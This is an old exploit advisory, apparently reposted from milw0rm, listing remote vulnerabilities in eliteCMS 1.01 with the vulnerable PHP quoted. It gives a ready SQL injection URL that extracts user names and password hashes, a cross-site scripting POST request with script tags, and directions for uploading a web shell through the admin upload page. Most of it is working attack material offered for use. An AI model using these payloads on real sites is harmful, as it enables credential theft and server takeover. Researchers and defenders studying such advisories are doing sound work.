# eliteCMS 1.01 (SQL/XSS) Multiple Remote Vulns # by xeno_hive # greets to daganarus, dearest of all my friends. # SQL injection (requires magic_quotes = off) ->/includes/functions.php --------------------------------- 89. function get_page_settings() { ... 92. $query = "SELECT * FROM pages WHERE id = '{$_GET['page']}'"; 93. $result = mysql_query($query); 94. confirm_query($result); 95. $page_settings = mysql_fetch_array($result); 96. return $page_settings; } ... 294. echo $page_settings['title']; --------------------------------- Exploit => index.php?page=-1'+union+select+1,concat(user_name,0x3a,h_password),3,4,5,6,7,8,9,10,11+from+users+limit+0,1/* then look at browser's title. # XSS (passive) (if contact form is enabled) ->/includes/contact_form.php --------------------------------- 36. $mailTo = $settings['site_email']; 37. $subject = "Feedback email from your eliteCMS website"; 38. $name = $_POST['name']; 39. $sender_email = $_POST['sender_email']; 40. $message = $_POST['message']; ... 54. $sendmail = @mail($mailTo, $subject, $body, $headers); --------------------------------- So attacker can send mail with http tags. --------------------------------- 61. $successMSG = "<span class=\"successMsg\">Thank you dear <span>$name</span> your message has been send successfully.</span>"; --------------------------------- And he can insert tags into the page. Exploit => POST-packet --------------------------------- POST /index.php?page=3 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) Host: localhost name=<script>alert("Name")</script> &sender_email=someone@evil.com &message=<script>alert("Message")</script> &email=Send Email --------------------------------- # Admin's file upload script without extension checking Upload your shell at /admin/manage_uploads.php. Then use it at /uploads/shell.php # milw0rm.com [2009-06-01]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论